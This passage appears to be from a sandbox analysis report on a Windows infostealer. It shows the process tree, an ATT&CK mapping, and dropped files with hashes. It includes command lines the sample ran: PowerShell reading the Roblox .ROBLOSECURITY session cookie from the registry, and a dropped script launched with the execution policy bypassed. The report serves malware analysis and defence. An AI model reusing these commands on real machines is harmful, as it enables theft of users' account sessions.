C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY"
2⤵
PID:6776

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
3⤵
PID:9612

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\\Roblox\\RobloxStudioBrowser\\roblox.com -Name .ROBLOSECURITY
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:5200

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
2⤵
PID:5452

C:\Windows\system32\tasklist.exe
tasklist
3⤵
PID:4972

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut11MHg.ps1" -RunAsAdministrator"
2⤵
PID:11184

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Roaming\salut11MHg.ps1" -RunAsAdministrator
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:8920

C:\Users\Admin\AppData\Local\Temp\Launcher.exe
"C:\Users\Admin\AppData\Local\Temp\Launcher.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\Admin\AppData\Roaming\theonlyscript" --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAABEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=4372 --field-trial-handle=1832,i,18116785064954537092,7766284800993023191,262144 --disable-features=SpareRendererForSitePerProcess,WinDelaySpellcheckServiceInit,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2
2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
PID:4680

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo.png
Filesize
78KB

MD5
2b67e47cb8da1058770fe41d8b947619

SHA1
9eb259b1d377a24a2b77a694cf31c23cef7b8eef

SHA256
46f616820751849512d2704ddb604666170d13315c4383b8c8611c3e1c2f594a

SHA512
27c0593d662df228e146c49af6da52e39523523af924cf95ba4890b1b42358b2b8df3cf2667d8f672eece4f7fe098574c4689677768dd54d3b872619c7b9ae55

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo128.png
Filesize
61KB

MD5
271847949971c396f77beaab936b7ea2

SHA1
b32c5a7eec49aa07f8ae73feb990626010c4b850

SHA256
a55224cdf06a5c2b937ba400604501f8b6ec93bc2c1cff62aa2fd378d504c657

SHA512
a2e141f68143f370e2b82a1c9c7c4b1c5f6fc2cfc2ad94acb8c5c02237af56f83904beaff3240e20397f0edbdfadf8779c0bd54b2cf0c9899fef59343e31794a

Download Submit
C:\ProgramData\ChromeExtensionsNova\extension-tokens\images\logo16.png
Filesize
2KB

MD5
192e90432fed0081abb25295d8f309c4

SHA1
5150e93061f39e26688afd60a04c0ab14b510d47

SHA256
3216d6864b4f8824b82eb887edf95436dac3bea3f7d43d8988a176e3f1f8e1b2

SHA512
9b9b3f85eb9f12ad1b4c8cfc5e672758d879e178179deb28e80e6c3b27871261bf6b52f9066850b5a7a2fd85012b5308eaf3dda882fa40febc9cf6b47f1a4f04

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
944B

MD5
96ff1ee586a153b4e7ce8661cabc0442

SHA1
140d4ff1840cb40601489f3826954386af612136

SHA256
0673399a2f37c89d455e8658c4d30b9248bff1ea47ba40957588e2bc862976e8

SHA512
3404370d0edb4ead4874ce68525dc9bcbc6008003682646e331bf43a06a24a467ace7eff5be701a822d74c7e065d0f6a0ba0e3d6bc505d34d0189373dcacb569

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
acf1a077eb84826a9bd4b9b02f77964b

SHA1
21d84eaf955d8b6cd2c84b065cf0d602ca617636

SHA256
579d80532c27b36b2898131cdf97f0bdded3b96e1d73c624b2b5b060921ac67c

SHA512
1f706ab2b9100c558a6fb41cf72063ec6a2d2e9fb6699ec4bb17298b8f5049ff472b2dd628d479afe530f80aed9a03e7a1d2b8b8cf7b93e84f5b713aeb4ec10b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
1KB

MD5
107102102e02e48f37f5318c7e113c43

SHA1
7fb10fc65c85fb4c050309f0872bc9389dcccc0d

SHA256
3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

SHA512
b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
64B

MD5
3ca1082427d7b2cd417d7c0b7fd95e4e

SHA1
b0482ff5b58ffff4f5242d77330b064190f269d3

SHA256
31f15dc6986680b158468bf0b4a1c00982b07b2889f360befd8a466113940d8f

SHA512
bbcfd8ea1e815524fda500b187483539be4a8865939f24c6e713f0a3bd90b69b4367c36aa2b09886b2006b685f81f0a77eec23ab58b7e2fb75304b412deb6ca3

Download Submit
C:\Users\Admin\AppData\Local\Temp\56ebf5a4-c16b-4ae6-bfd4-7c9ab112327c.tmp.node
Filesize
151KB

MD5
bec0df3a37e6681b7eb29bd15904147a

SHA1
82a0869313ad7dcd86de3b5fa0e516d160c17013

SHA256
3d185f516d23d8c98a17e304b00b405b74dd7f3f6fb7d750bb7471deb1a9689f

SHA512
ae0639566f24e65a6a381862e020e39a32bec408b88eba60d3b01400c49535f09c6c67f424af406db78af2f197d79c3e262050ff5e17910c1ac1453561fffcd1

Download Submit
C:\Users\Admin\AppData\Local\Temp\GB_NOVA_Admin_191.zip
Filesize
2KB

MD5
9d8e530d3dbcf12f809365de2eda71df

SHA1
2800985c05cd94fd070d4d4e1407e9866d83c1e2

SHA256
75a3beca6823de661f3e9ab8392fb0f9bf94005ede4026eb83a4e49dfd61476b

SHA512
69d419e906752fbf27bc5e09719977c4000e3de3d25671f625c2d8f4d75b2941f564da46eb6d53ef52f8b142f965ce7b42ccd42b5e16f3f8d4166d660a436d3f

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_i2zf3h3g.wdx.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\b139674d-c7b9-4086-ae77-c7e29d6fd164.tmp.node
Filesize
1.4MB

MD5
56192831a7f808874207ba593f464415

SHA1
e0c18c72a62692d856da1f8988b0bc9c8088d2aa

SHA256
6aa8763714aa5199a4065259af792292c2a7d6a2c381aa27007255421e5c9d8c

SHA512
c82aa1ef569c232b4b4f98a3789f2390e5f7bf5cc7e73d199fe23a3f636817edfdc2fb49ce7f69169c028a9dd5ab9f63e8f64964bb22424fc08db71e85054a33

Download Submit
C:\Users\Admin\AppData\Local\Temp\tXskVTVfs6mD_tezmp.ps1
Filesize
728B

MD5
f4f03f8688ae1d75c9aac016b07fcf7b

SHA1
34bb10f809b86d9d8fa82a744aacfa90a5d9b884

SHA256
38af9fb4531771d10417959bf3f2c3eda492c14b3bb354235c823523ed7b732d

SHA512
e988e6861fb73568f46108823b6c0c3d7fd730460cfaed6c966c19783e2bb8c03bb2cf660443e048371a005f8cf7d6418411172a83af6a070c7e895f86441913

Download Submit
C:\Users\Admin\AppData\Roaming\elYi6AJSLLKN.vbs
Filesize
140B

MD5
90649b00e3c823f83f90360f2ed598d1

SHA1
44b304f29d7d51796570fc51e53bb031fa397f9d

SHA256
e740a7032e4106e0ff683e98520666b63e6a815be36a4939cba548e656e0dd43

SHA512
94d1cedd9ddc4dd7f60972bd6328382bf29a6bc90ee560045e9049b0522394e80b976f3021827e7c2beb742800f65835ac3c6a87e1f82ec4aa273c569b852ce9

Download Submit
C:\Users\Admin\AppData\Roaming\salut11MHg.ps1
Filesize
349B

MD5
28e4eda7451c625bbe806b745753f729

SHA1
d29e9b2c2ac5b10188cbae92cffba6827728543d

SHA256
da79e10cdff90aa7f5ab3d3f226570107ecd20d48eb14067c7900367111df5ba

SHA512
932f53b6cd2aa55ab1475d85528069357fa7d9eea26051d1a4edb11872ca30d02c31c44bed3a48f0ccdbebe556e9d8ec2f4a0815bf177d93ab4272b3fe2fb0b5

Download Submit
memory/4680-509-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-508-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-510-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-515-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-520-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-516-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-519-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-518-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-517-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/4680-514-0x000002C17DCE0000-0x000002C17DCE1000-memory.dmp

Filesize
4KB

Download
memory/10940-25-0x000001B4FDF50000-0x000001B4FDF72000-memory.dmp

Filesize
136KB

Download